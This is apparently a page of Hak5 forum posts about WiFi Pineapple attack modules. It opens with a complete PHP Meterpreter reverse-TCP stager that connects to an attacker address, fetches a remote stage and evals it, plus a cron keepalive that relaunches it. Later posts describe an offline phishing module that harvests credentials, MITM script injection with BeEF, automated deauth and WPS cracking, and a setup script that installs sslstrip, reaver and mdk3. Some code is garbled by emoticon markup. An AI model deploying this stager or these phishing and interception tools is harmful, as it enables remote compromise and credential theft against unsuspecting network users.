Most Liked Content

Hi everyone !

My new module: a network manager for our pineapple.

This module give the ability to manage all wifi interfaces (e.g. connect to hotspot), internet sharing, etc.

So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress.

Here's a screenshot of it in action using armitage / cobalt strike (front-end for metasploit):


And here's a pic of the module WIP:



It's based off the PHP Meterpreter. To test it launch msf console and use the php/meterpreter_reverse_tcp payload.
Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch.

Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port.

Here's the php meterpreter:

<?php

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '172.16.42.42';
$port = 4445;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
	# ipv6 requires brackets around the address
	$ip = "[". $ip ."]";
	$ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
	$s = $f("tcp://{$ip}:{$port}");
	$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
	$s = $f($ip, $port);
	$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
	$res = @socket_connect($s, $ip, $port);
	if (!$res) { die(); }
	$s_type = 'socket';
} else {
	die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($<img src='http://forums.hak5.org/public/style_emoticons/default/cool.gif' class='bbc_emoticon' alt='B)' /> < $len) {
	switch ($s_type) { 
	case 'stream': $b .= fread($s, $len-strlen($<img src='http://forums.hak5.org/public/style_emoticons/default/cool.gif' class='bbc_emoticon' alt='B)' />); break;
	case 'socket': $b .= socket_read($s, $len-strlen($<img src='http://forums.hak5.org/public/style_emoticons/default/cool.gif' class='bbc_emoticon' alt='B)' />); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($<img src='http://forums.hak5.org/public/style_emoticons/default/cool.gif' class='bbc_emoticon' alt='B)' />;
die();

?>

Just change IP and Port above to what you're using.

The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code:

meterpreter.php

<?php                                                                                                    

if(isset($_GET['start'])) {
	echo "<pre>Starting Meterpreter</pre>";
	exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

//	if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") {
//		exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh");
//	} else {
//		echo "<pre><b>Meterpreter already running</b></pre>";
//	}
}

$filename = $_POST['filename'];                                                                          
$newdata = $_POST['newdata'];                                                                            

if ($newdata != "") { $newdata = ereg_replace(13,  "", $newdata);                                        
$fw = fopen($filename, 'w') or die('Could not open file!');                                             
$fb = fwrite($fw,stripslashes($newdata)) or die('Could not write to file');                             
fclose($fw);                                                                                            
$fileMessage = "Updated " . $filename . "<br /><br />";                                                 
} ?>


<html>
    <head>
    <title>Pineapple Control Center</title>
    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
    <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" />
    <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon">
    </head>
<body>
<?php
include_once("/www/pineapple/includes/navbar.php");
?>
<br><br>
<center>
<table width="50%">
<tr><td>
<div class=news>
	<div class=moduleTitle><b>Configuration</b></div>
	<div class=moduleContent>
	Edit IP address and Port below to match that of your metasploit session.
	<?php                                                                                                                                                                                                               
	$filename = "/www/pineapple/modules/meterpreter/tt.php";
	$fh = fopen($filename, "r") or die("Could not open file!");
	$data = fread($fh, filesize($filename)) or die("Could not read file!");                                                                                                                                           
	fclose($fh);                                                                                                                                                                                                      
	echo "<form action='$_SERVER[php_self]' method= 'post' >                                                                                                                                                           
	<textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>$data</textarea>                                                                               
	<input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'>
	<br><center><input type='submit' value='Update Meterpreter Script'>                                                                                                                                                                
	</form>";                                                                                                                                                                                                           
	?>       
	
	</div>

	<br>
	<div class=moduleTitle>Meterpreter Configuration</div>
	<div class=moduleContent>
	This keep alive script will restart the Meterpreter session if it drops connection.
	
	
	</div>
</td></tr></table></center>
</body>
</html>

meterpreter-keepalive.sh

#!/bin/sh
# -------------------------------------------------
# Simple keep alive script for meterpreter sessions
# -------------------------------------------------
logger "Meterpreter: Keep-Alive Script Executed"
if ! ( pidof php tt.php); then
	php /www/pineapple/modules/meterpreter/tt.php &
	logger "Meterpreter: Connection was down, restarted."
else
	logger "Meterpreter: Connection seems to be up."
fi

My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / packing it up.

Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...

Hi guys !

I wanted to share my current module project for the pineapple: a "man-in-the-middle" module

Features:
- based on mitmdump and extendable through python scripts
- log history
- helpers to install javascript
- editor to edit scripts

Scripts Sample:
- Simple_Alert.py -> Will trigger an alert to the user.
- BeEF.py -> This would actually replace the BeEF Helper module
- Upsidedown.py -> Will reverse all web page, nice for April fool day
- Snow_storm.py -> Will insert snow on all web page.

 

Hey guys!

 

I present you, Automator!, A module that automates attacks such as Deauthing and Karma, Auto-Reaver and Auto-Aircrack, and more on the way! It asks you for a few options on each attacks then commences the attack.

 

Features :

-Automated attacks

-Install packages that are needed

-Add and Edit profiles for attacks

-Blackout Attacks - Disable all LEDs, enable stealth mode and select an attack!

 

Coming soon :

-Edit back-end scripts to suit your needs

-Add community attacks/automations to the module

-Auto-detect wifi cards

 

Sneak peak :

 

What makes you think they'll read this post if they don't read the first pinned post at the top of this page?

This is just some proof of concept code I have been working on and finally got to a good point. My thought behind this project is to give you a way to control your pineapple that doesn't look like you are a "hacker" or what ever. It just looks like you are texting your brother or girlfriend or what ever telling them to turn on the oven, or open the front door for you or something like that. When the pineapple receives a message that says something like "hey man open the front door for me, thanks" it turns on karma and sends a message back that says "Hey, the front door is open and don'y worry about it".

 

I will be releasing this code soon on here I just need to make it nice and pretty first and get some ideas from you guys first.

 

 

Here is a video of it in action:

 

 

(I completely forgot to show that karma turned on but just take my word for it that it did!)

 

Can a moderator please move this to the project section? Sorry, and thanks in advance!

Saw the challenge coin in the hak5 shop, and realized, 7 plus years and counting. Wow. There aren't a lot of things on the internet that last that long, let alone podcasts or internet TV shows, including hacker groups and movements in general. Hak5 is one of those things, you either love us or hate us, but I say us, because for as long as I've watched the show, its always been about the community around the show as part of the show and not just about the people in front of the camera. From past cast and crew members, to feuds I'll never understand completely, nor need to, to the sub culture that was the old Hak5 IRC and original forums, to today's current show and forums, we're still here.

Back in about 2004/2005 I was watching a lot of weird stuff, some good, some bad, some foreign TV just because I could and it was different. I remember watching Sean Kennedy and a few others on Rant Media, some playlist of stuff I found on some site somewhere, using of all things, WinAMP on Windows 98 (yes, I didn't move to XP until around 2006 or so). One night there was a rotation of techy shows and just internet TV in general. Most of it was just people with cameras goofing off, pre YouTUBE era, so seeing real people from around the world video tape themselves and put it online to watch, was kind of home movie style, no real direction but still entertaining. People wanted to talk and get their message out, and lots of others found they had the same interests, or common topics of interest such as technology and computers. Then I caught an episode of Hak5, and began to try and figure out what it was I was watching, since I hadn't found it through their site, but from some playlist with a rotation of stuff like SKTFMTV. This was a bit different, and less anarchist and underground. This was just a group of young geeks, but they seemed to have things down a bit and looked like the kind of friends I hanged with, drinking beer and messing about with computers and stupid shit. Their show was structured and flowed naturally, and everyone seemed to just speak like the average Joe and make sense of what they were doing with their projects, explaining them in detail, almost instructional, but not too hard to follow along with, and I was learning something new each month on top of staying interested. I was instantly hooked on the show, and for a while, so was my wife.

Working at a bank at the time, doing data processing, running VSE and MVS on an IBM Mainframe, I already had an interest in computers, technology, and wanting to know hoe everything worked. I was also building websites on the side just by teaching myself by viewing the source of websites and figuring out, what happens if I change this here or move this here, etc. I was also in a band at the time, and ready to quit my job and move to Oregon to play music full time, something that I was very close to doing had it not been for computers. Because I knew how to create websites, I was obviously in charge of doing our bands website and also in charge of recording our music, which was everything from just about us, to a music and band review site of other bands, where people would mail me CD's and I would review and post their music online for others to listen to, to going back to just being about our band. I had my own music studio and started recording other bands albums, mixing, mastering and producing stuff, while my band mate moved to Oregon, I stayed behind working on computers and recoring my own music at home. We were still trying to figure out how to make a living at being musicians ourselves and monetize our work at the same time... Needless to say, I decided a steady pay check working at the bank made more sense than moving to Oregon to sleep on someones floor while trying to find work in a state and town I knew nothing about. My bandmate was not making any kind of real money, and he was still playing open mic nights, pretty much what we were doing here, so I said screw it, I'm not leaving good money and benefits for being homeless and nothing to live on.

I met my wife, and my work at the bank was the more solid and important move, which led to many promotions and new responsibilities, and in some part, Hak5 and my interest in computers kind of kept me grounded to that. I wanted to get more into networking and building computers, fixing and learning about them and Hak5 helped keep that interest for much of my inspiration with computers. I became somewhat the geek of our department, where most of the people I worked with were older than me, often 30 or more years older than me and half computer illiterate, but they had been doing Mainframe Data Processing for most their life, and like trained monkeys, only knew what they were taught. I learned my job in 2 weeks, something that wasn't supposed to happen that way, but because I had a knack for computers, I more or less picked it up right away, and the guy who trained me then jumped ship and left me to fend for myself. I spend the next year working with my boss over the phone most nights, having him actually teach me how to do most of what my trainer had not. It was sink or swim, which is kind of true in today's IT world. If tasked to do something, they expect you to figure it out, whether you've been shown or trained how to do it or not. Hak5 and the forums kind of helped fill that void because there were and are still plenty of things people come in here asking about that I have no clue about, and it keeps me on my toes. One learns real fast how to find info online and I developed my own ways of finding information long before I'd ever even heard the term "google dork", using sites as old as WebCrawler, Lycos, Excite and Yahoo, and even MSN search, I don't even remember what year it was when I made Google my default home page on my browsers...

When the show first started, DIVX and XVID were all the rage for making home movies online. RealPlayer and windows media player were becoming old hat, and broadband was becoming more accessible, so downloading 300, 400, and 600mb tv shows was becoming common place. My wife and I used to download all the early Hak5 episodes and I would burn them on dvd so we could watch them together on our living room DVD player, which at the time was one of the first stand alone DVD players to be able to play DIVX and XVID avi files. It was there, that we spent hours watching all the early season one and two stuff and became fans. By sometime around 2006 and I joined the forums and I've been here ever since. A lot has changed over the years, but a lot is still truly the same if you look at everything the cast has done and gone through, to what the community is today.

I don't come in as often as I used to, and I've seen plenty of rotation of cast members over the years, but the show is larger than the sum of its parts, past and present. Its existence is still here because of everyone, not just the crew, but also because of the community, on and offline. We get picked on a lot and I've heard some harsh words here and there over the years from other groups and communities that like to make it out as a rivalry thing, people who've put us down, hacked into the site and forums, dumped our passwords and so on, but as far as I am concerned, we have some of the smartest and brightest people, right here in the Hak5 community. We may not go around defacing websites, or teaching people how to steal credit cards, or run LOIC's to DDoS websites, but I think people here are smart enough to know how to handle themselves, and know that hacking isn't about how many boxes you can pop, but its more about the people, the knowledge and the relationships made with others in the community and that shared interest in technology and inventiveness in general.

I've met some of you in person, talk with many of you online, and also worked with some of you on a number of projects. I've even started a second business with one of the members of our community, all because I trust and respected his abilities. I have the highest respect for all those who have come and gone and contributed to the community over the years, both cast and crew members, to moderators and the original IRC people who lurked in the shadows. By and large, you are all why Hak5 is still here, 7 years later, keeping us entertained each week, but also what keeps our interest. I love coming to the forums to see questions I have no answers for, because it means I still have a lot to learn,things to research and figure out on my own, and for as many that have tried to come in and take things down, troll us, or just plain insult us, I have met some of the nicest, humblest, and smartest people in the hacker community because of Hak5. I would have never met half the people I worked for and work for today, such as the folks at Offensive Security and Social-Engineer.org, or people like Dave Kennedy and Iron Geek who put on Derbycon. Its because of Hak5 and others like them that I keep coming back.

For what its worth, I hope Hak5 and the rest of us are still here another 7 years from now. Have a safe and Happy New Year, to all the cast, crew and community, past present and future! Cheers and trust your technolust!

I am almost finished with v0.1 of my offline phishing module. The premise of this module is simple. You set the ssid of an open wireless network (Free Public Wifi, etc.) When enabled, all requests will be forwarded to a 'walled garden' splash page. This will inform the viewer that they have limited access to only certain pages, and will give links to these pages. Every one of these pages  are phishing pages that you can upload to the module (even your own!).

Since all phishing pages are hosted locally, this module is intended to work all of the time, without internet access. It gives the user the impression that they are connecting to pages on the internet, yet all credentials are harvested.

Another beautiful thing about this module is how little hardware it uses. I have been known to have up to 3 usb wifi cards plugged into my pineapple while using for deauth/wifi repeating etc... This module can be used with only a properly formatted flash drive, eliminating a need for a usb hub (and the extra power it consumes).

I need Seb or someone at wifipineapple.com to verify me for module submission.

I also would like to talk to Petertfm about this module. I have reused (embarrassingly large amounts of) his code from his RandomRoll module in this. Our modules are extremely similar in both frontend and backend. I would like to ask him a couple of questions/ get him to sign off on the parts of his code I used before making this public. I have tried to message him but he does not accept messages. Petertfm if you read this, please send me a message or an email at my uname [at] gmail.

Hey hackers !

I'm working on the reaver module. I think I'm near a beta release.

EDIT :   v0.4 Released

Features :

• System check (install reaver if not already installed)
• Choose where to install reaver (internal or USB)
• Select the interface to scan (based on networkmanager module)
• Select AP to attack (based on networkmanager module)
• Launch/Stop the attack
• Auto-Refresh output
• 3 switches (-c, -a, -S)
• enable/disable interface
• reworked layout
• Wiki page added in the pineapple wiki
• NEW : Fix bug : check if reaver is installed
• NEW : Propose install on usb only in case of detection of a mounted drive

Future Features :

• Reaver options (all or most useful available arguments)
• Verbosity level
• Trigger alert on key found
• Start at boot
• [postponed][new] use of wash to scan ap (wps checker) -> I'm still having issue with this command, postponed until 100% working.
• [new] manage logs (internal/usb, move and copy, log cleaning (empty or delete)
• You choose ...

Github (contribute coding, wiki (to merge with pineapple-wiki), ...) : https://github.com/Hackrylix/reaver

Official Wiki : http://cloud.wifipin...u.php?id=reaver

Credits to Whistle Master for the use of parts of his code.

What kind of feature do you want ? How do you want I show the module page ? Any suggestion is welcome !

Cheers


v0.4 screen shots :

After weeks of researching, writing, rewriting and more fun then I care to mention with page layout software, I present to you the first WiFi Pineapple book.

Booklet really. It's just 50 pages. This booklet outlines basic usage of the WiFi Pineapple including; Connectivity, Power Considerations, Windows and Linux setup, Inside the Web Interface, SSH Management, Meterpreter, Expansion Modules and more.

Download the PDF:
https://www.dropbox.com/s/dr6sedfteu8atwq/hak5-mk4-book1e.pdf

Or buy one on the HakShop for $5:
http://hakshop.mysho...neapple-booklet

Hey everyone,

A feature which we wanted to build into the pineapple for some time is an easy way to create modules.
Currently creating modules is complicated and simply a hassle and may scare of people with great ideas.
This is why the Bartender was born!

Rather than making it part of the current firmware the Bartender feature will be released as a module to enable faster updates if the module system changes.

One thing though, updating the module will cause a loss of all your created projects, so make sure to back these up.
This will be addressed in the next module update.

Just remember, this is just a basic module creator, in the future it will:

• Allow code upload.
• Direct module submission from your pineapple.
• Projects persistent through a Bartender update.
• Quite a lot more.

To use the Bartender, simply download the module and follow the instructions there.


Please leave any feedback, comments or suggestions here.

Best Regards,
Sebkinne

I made a script that I run after a reflash and It has come in handy when I mess the pineapple up and have to re install firmware, was getting tired of inputting this manually.

pineapple-mk4-setup-script.sh
Version 3.2

#!/bin/sh

# Version 3.2
# This is a script for the pineapple mark 4 firmware 2.7.1 up, Newer firmware may break this script, Read through to add or comment out what you don't want.
# Run: chmod +x pineapple-mk4-setup-script.sh; ./pineapple-mk4-setup-script.sh
# It is assumed a USB drive with swap partition is unplugged and waiting to be inserted: http://forums.hak5.org/index.php?showtopic=25882&hl=swap&st=0



red='\e[0;31m'
lightRed='\e[1;31m'
green='\e[0;32m'
yellow='\e[0;33m'
cyan='\e[0;36m'
textReset='\e[m'
bold='\033[1m'
boldEnd='\033[0m'
uWhite='\e[4;37m'


appleSuccess=true
changeTimeZone=true
autoStartKarma=true
DNSSpoofLogsToUSB=true
changeSSID=true
changePineapplePort=true
stealthAutoStart=true

updateFSTabForSwap=true
useUSB=true # Please use one;-)

cleanUpUSB=true
logsToUSB=false


isThereInternet=true # Required for installing packages!!!

# All get installed to /usb/
installSSLStrip=true # Requires Internet
installTCPDump=true # Requires Internet
installNMap=true # Requires Internet
installReaver=true #Requires Internet
installMDK3=true #Requires Internet


changeRootPassword=true
newrootpassword='pineapplesareyummy'

newSSID='AndroidAP'
newPineapplePort=1471 # make sure it's above 1024

newTimeZone='PST8PDT'                    # PST8PDT America/Vancouver visit http://wiki.openwrt.org/doc/uci/system#time.zones for a list of time zones
newTimeZoneLocation='America/Vancouver'    # Please be careful, do not put in the whole value IE "PST8PDT,M3.2.0,M11.1.0" just use the PST8PDT
                                        # If you mess this up you may need to use serial connection to fix!!!

echo
echo -e $uWhite$bold'Pineapple Mark 4 setup script created by'$cyan' petertfm'$textReset
echo
echo


# Enable Apple Success to disable portal page popup when dnsspoofing with no internet:
if [ $appleSuccess = true ]; then
    if [ -d /www/ ]; then
        if [ ! -d /www/library/ ]; then
            mkdir /www/library
            if [ ! -d /www/library/test/ ]; then
                mkdir /www/library/test
            fi
        fi
        if [ ! -f /www/library/test/success.html ]; then
            echo -e '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
        <TITLE>Success</TITLE>
</HEAD>
<BODY>
Success
</BODY>
</HTML>' > /www/library/test/success.html
        fi
        echo -e '/www/library/test/success.html Created: Tricks apple products to beleve there is internet when running dnsspoof.'
    else
        echo -e $lightRed'/www/ folder not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# Change Timezone:
if [ $changeTimeZone = true ]; then
    if [ -f /etc/config/system ]; then
        echo -e 'Changing TimeZone: '$yellow$newTimeZone$textReset'   Location: '$yellow$newTimeZoneLocation
        sed -i "s/option timezone.*/option timezone '"$newTimeZone"'/g" /etc/config/system
        if [ -f /etc/rc.d/S98sysntpd ]; then
            /etc/rc.d/S98sysntpd restart
        else
            echo -e $lightRed'/etc/rc.d/S98sysntpd file not found, most likely script needs to be updated, firmware may have changed'
        fi
    else
        echo -e $lightRed'/etc/config/system file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# AutoStart Karma
if [ $autoStartKarma = true ]; then
    if [ -f /pineapple/karma/autoKarmaStart.php ]; then
        php /pineapple/karma/autoKarmaStart.php > /dev/null
        echo 'Karma AutoStart Enabled'
    else
        echo -e $lightRed'/pineapple/karma/autoKarmaStart.php file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# DNSSpoof Logs to USB:
if [ $DNSSpoofLogsToUSB = true ]; then
    if [ -f /pineapple/dnsspoof/dnsspoof.sh ]; then
        echo -e '#!/bin/sh

if [ ! -d /usb/logs ]; then
    mkdir /usb/logs
fi
if [ ! -d /usb/logs/DNSSpoof ]; then
    mkdir /usb/logs/DNSSpoof
fi

if [ -b /dev/sda1 ]; then
    MYPATH="/usb/logs/DNSSpoof/DNSSpoof-"
    dnsspoofFile="null"
    x=1
    while :
    do
        dnsspoofFile=${MYPATH}${x}.log
        if [ ! -f $dnsspoofFile ]; then
                break
        fi
        x=$(( $x + 1 ))
    done

    if [ -f /usb/logs/DNSSpoof/DNSSpoof.log ]; then
        md5=`md5sum /usb/logs/DNSSpoof/DNSSpoof.log`
        if [ ${md5:0:32} != "9a13ce17b26d5d2e2e153584c2d7c8e8" ]; then
            cp /usb/logs/DNSSpoof/DNSSpoof.log ${dnsspoofFile}
        fi
    fi

    sed -i "s/$cmd = \\"cat logs\\/dnsspoof.log\\";.*/$cmd = \\"cat \\/usb\\/logs\\/DNSSpoof\\/DNSSpoof.log\\";/g" /pineapple/pages/logs.php
    dnsspoof -i br-lan -f /pineapple/config/spoofhost > /dev/null 2> /usb/logs/DNSSpoof/DNSSpoof.log
else
    sed -i "s/$cmd = \\"cat \\/usb\\/logs\\/DNSSpoof\\/DNSSpoof.log\\";.*/$cmd = \\"cat logs\\/dnsspoof.log\\";/g" /pineapple/pages/logs.php
    dnsspoof -i br-lan -f /pineapple/config/spoofhost > /dev/null 2> /pineapple/logs/dnsspoof.log
fi' > /pineapple/dnsspoof/dnsspoof.sh
        echo 'Installed DNSSpoof logs to usb by petertfm'
    else
        echo -e $lightRed'/pineapple/dnsspoof/dnsspoof.sh file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# Changing SSID:
if [ $changeSSID = true ]; then
    echo -e 'Changing SSID: '$yellow$newSSID
    sed -i 's/option ssid.*/option ssid '$newSSID'/g' /etc/config/wireless
    echo -e $textReset
fi


# Changing Pineapple UI Port:
if [ $changePineapplePort = true ]; then
    echo -e 'Changing Pineapple UI Port: '$yellow$newPineapplePort
    currentPort=`cat /etc/config/uhttpd | grep -i listen_http | grep -v listen_https | tail -n 1`
    currentPortPos=`expr index "$currentPort" :`
    port=${currentPort:$currentPortPos}
    sed -i 's/'$port'/'$newPineapplePort'/g' /etc/config/uhttpd
    echo -e $textReset
fi


# Enable Stealth:
if [ $stealthAutoStart = true ]; then
    if [ -f /etc/rc.local ]; then
        sed -i '/icmp_echo_ignore_all/d' /etc/rc.local
        sed -i '/exit 0/d' /etc/rc.local
        echo -e 'echo -e 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all # Autostart Stealth mode
exit 0' >> /etc/rc.local
        echo 'Stealth AutoStart Enabled'
    else
        echo -e $lightRed'/etc/rc.local file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# Updating FStab(USB):
if [ $updateFSTabForSwap = true ]; then
    if [ -f /etc/config/fstab ]; then
        echo 'Updateing fstab for use with swap partition'
        echo -e 'config global automount
       option from_fstab 1
       option anon_mount 1

config global autoswap
       option from_fstab 1
       option anon_swap 1

config mount
       option target   /usb
       option device   /dev/sda1
       option fstype   ext4
       option options  rw,sync
       option enabled  1
       option enabled_fsck 0

config swap
       option device   /dev/sda2
       option enabled  1' > /etc/config/fstab
    else
        echo -e $lightRed'/etc/config/fstab file not found, most likely script needs to be updated, firmware may have changed'
        echo -e $red'This script is outdated, Exiting...'
        exit 1
    fi
    echo -e $textReset
fi






#
##
###
####
##### The rest of this script is mostly USB related with an exception to changing the root password
if [ $useUSB = true ]; then

    echo
    read -p 'Please Insert USB Drive then press ENTER!!!' nullVar
    echo 'Sleeping 15 seconds, USB drive initializing.'
    sleep 15
    echo -e $textReset

    if [ -b /dev/sda1 ]; then # The dev name of what gets mounted to /usb/

        # Make swap:
        if [ $updateFSTabForSwap = true ]; then
            if [ -b /dev/sda2 ]; then
                echo 'mkswap /dev/sda2, Swap may already have been made previously'
                mkswap /dev/sda2
            else
                echo -e $lightRed'/dev/sda2 not found for swap!'
            fi
            echo -e $textReset
        fi


        # Starting fresh with pineapple created files/folders on USB, From a previous install/firmware.
        if [ $cleanUpUSB = true ]; then
            echo 'Removing folders on USB, In prep for fresh settings'
            echo -e $yellow'(NOTE) Keep /usb/etc/ and /usb/usr/ to save previously installed OPKG packages'$textReset
            if [ -d /usb/data/ ]; then
                echo -n -e "Remove /usb/data/ "$cyan"(y)/n? "$textReset
                read dataYesNo
                if [[ "$dataYesNo" == '' ]]; then
                    dataYesNo='y'
                fi
                if [ $dataYesNo == 'y' ]; then
                    echo 'Removing: /usb/data/ TCPDump module is known to use this folder'
                    rm -r /usb/data/
                fi
            fi
            if [ -d /usb/get/ ]; then
                echo -n -e "Remove /usb/get/ "$cyan"(y)/n? "$textReset
                read getYesNo
                if [[ "$getYesNo" == '' ]]; then
                    getYesNo='y'
                fi
                if [ $getYesNo == 'y' ]; then
                    echo 'Removing: /usb/get/ get module is known to use this folder'
                    rm -r /usb/get/
                fi
            fi
            if [ -d /usb/logs/ ]; then
                echo -n -e "Remove /usb/logs/ "$cyan"(y)/n? "$textReset
                read logsYesNo
                if [[ "$logsYesNo" == '' ]]; then
                    logsYesNo='y'
                fi
                if [ $logsYesNo == 'y' ]; then
                    echo 'Removing: /usb/logs/'
                    rm -r /usb/logs/
                fi
            fi
            if [ -d /usb/modules/ ]; then
                echo -n -e "Remove /usb/modules/ "$cyan"(y)/n? "$textReset
                read modulesYesNo
                if [[ "$modulesYesNo" == '' ]]; then
                    modulesYesNo='y'
                fi
                if [ $modulesYesNo == 'y' ]; then
                    echo 'Removing: /usb/modules/'
                    rm -r /usb/modules/
                fi
            fi
            if [ -d /usb/infusions/ ]; then
                echo -n -e "Remove /usb/infusions/ "$cyan"(y)/n? "$textReset
                read infusionsYesNo
                if [[ "$infusionsYesNo" == '' ]]; then
                    infusionsYesNo='y'
                fi
                if [ $infusionsYesNo == 'y' ]; then
                    echo 'Removing: /usb/infusions/'
                    rm -r /usb/infusions/
                fi
            fi
            if [ -d /usb/etc/ ]; then
                echo -n -e "Remove /usb/etc/ "$cyan"(y)/n? "$textReset
                read etcYesNo
                if [[ "$etcYesNo" == '' ]]; then
                    etcYesNo='y'
                fi
                if [ $etcYesNo == 'y' ]; then
                    echo 'Removing: /usb/etc/'
                    rm -r /usb/etc/
                fi
            fi
            if [ -d /usb/usr/ ]; then
                echo -n -e "Remove /usb/usr/ "$cyan"(y)/n? "$textReset
                read usrYesNo
                if [[ "$usrYesNo" == '' ]]; then
                    usrYesNo='y'
                fi
                if [ $usrYesNo == 'y' ]; then
                    echo 'Removing: /usb/usr/'
                    rm -r /usb/usr/
                fi
            fi
            if [ -d /usb/var/ ]; then
            echo -n -e "Remove /usb/var/ "$cyan"(y)/n? "$textReset
                read varYesNo
                if [[ "$varYesNo" == '' ]]; then
                    varYesNo='y'
                fi
                if [ $varYesNo == 'y' ]; then
                    echo 'Removing: /usb/var/'
                    rm -r /usb/var/
                fi
            fi
            echo -e $textReset
        fi


        # /logs/ folder to USB:
        if [ $logsToUSB = true ]; then
            if [ -d /pineapple/logs/ ]; then
                # Moving logs folder to USB is experimental, After this change the usb drive must remain inserted at all times
                echo 'Moving /pineapple/logs/ folder to /usb/logs/, and sym linking back to /pineapple/logs'
                echo -e $yellow$bold'WARNING!!! from this point on the usb drive must be inserted at all times!'$boldEnd
                mv /pineapple/logs/ /usb/
                ln -s /usb/logs/ /pineapple/logs
                echo 'To revert back: rm /pineapple/logs; mv /usb/logs/ /pineapple/'
            else
                echo -e $lightRed'/pineapple/logs folder not found, most likely script needs to be updated, firmware may have changed'
            fi
            echo -e $textReset
        fi




        # OPKG Update:
        if [ $isThereInternet = true ]; then
            opkg update
            echo
            echo -e $textReset


            # Install SSLStrip:
            if [ $installSSLStrip = true ]; then
                # This will take a couple minutes to complete
                echo 'Installing SSLStrip, This will take a moment to complete...'
                opkg --dest usb install sslstrip
                touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py
                echo
                echo
                echo -e $textReset
            fi
    
    
            # Install TCPDump:
            if [ $installTCPDump = true ]; then
                echo 'Installing TCPDump'
                opkg --dest usb install tcpdump
                echo
                echo
                echo -e $textReset
            fi
    
    
            # Install NMap:
            if [ $installNMap = true ]; then
                echo 'Installing NMap'
                opkg --dest usb install nmap
                echo
                echo
                echo -e $textReset
            fi
    
    
            # Install Reaver:
            if [ $installReaver = true ]; then
                echo 'Installing Reaver'
                opkg --dest usb install reaver
                echo
                echo
                echo -e $textReset
            fi


            # Install MDK3:
            if [ $installMDK3 = true ]; then
                echo 'Installing MDK3'
                opkg --dest usb install mdk3
                echo
                echo
                echo -e $textReset
            fi


            # Needed extras for packages installed to /usb/
            if [ -d /usb/etc/ ]; then
                echo 'Sym linking /usb/etc/* with /etc/'
                ls /usb/etc/
                ln -s /usb/etc/* /etc/
                echo
            fi
            
            if [ -d /usb/usr/sbin/ ]; then
                echo 'Sym linking /usb/usr/sbin/* with /usr/sbin/'
                ls /usb/usr/sbin/
                ln -s /usb/usr/sbin/* /usr/sbin/
                echo
            fi
            
            if [ -d /usb/usr/share/ ]; then
                echo 'Sym linking /usb/usr/share/* with /usr/share/'
                ls /usb/usr/share/
                ln -s /usb/usr/share/* /usr/share/
                echo
            fi
            
            if [ -d /usb/usr/lib/ ]; then
                echo 'Sym linking /usb/usr/lib/*.* with /usr/lib/'
                ls /usb/usr/lib/
                ln -s /usb/usr/lib/*.* /usr/lib/
                echo
            fi
            
            if [ -d /usb/usr/include/ ]; then
                if [ ! -d /usr/include/ ]; then
                    echo 'Making directory /usr/include'
                    mkdir /usr/include
                fi
                echo 'Sym linking /usb/usr/include/* with /usr/include/'
                ls /usb/usr/include/
                ln -s /usb/usr/include/* /usr/include/
            fi

            echo
            echo

        fi # End of Internet Functions




    fi
fi
#####
####
###
##
# End of USB Functions






# Change root password:
if [ $changeRootPassword = true ]; then
    echo -n -e "Change root password to:"$yellow$newrootpassword$cyan" (y)/n? "$textReset
    read newPasswordYesNo
    if [[ "$newPasswordYesNo" == '' ]]; then
        newPasswordYesNo='y'
    fi
    if [ $newPasswordYesNo == 'y' ]; then
        echo -e $newrootpassword'\n'$newrootpassword | passwd
        echo -e 'New password for root: '$yellow$newrootpassword
        echo -e $textReset'Warning if root password is lost serial connection is required!!!'
    fi
    echo
    echo -e $textReset
fi


# Restart Pineapple UI Port:
if [ $changePineapplePort = true ]; then
    echo -e $textReset'Rebooting uhttpd server...'
    /etc/init.d/uhttpd restart
    echo -e $textReset
fi


echo
echo
echo -e $cyan'Issue reboot to finish'$textReset

 

Read through to see what it is setting up. there are links to the files in the script or just comment out that stuff.
:-D

Hi everyone !

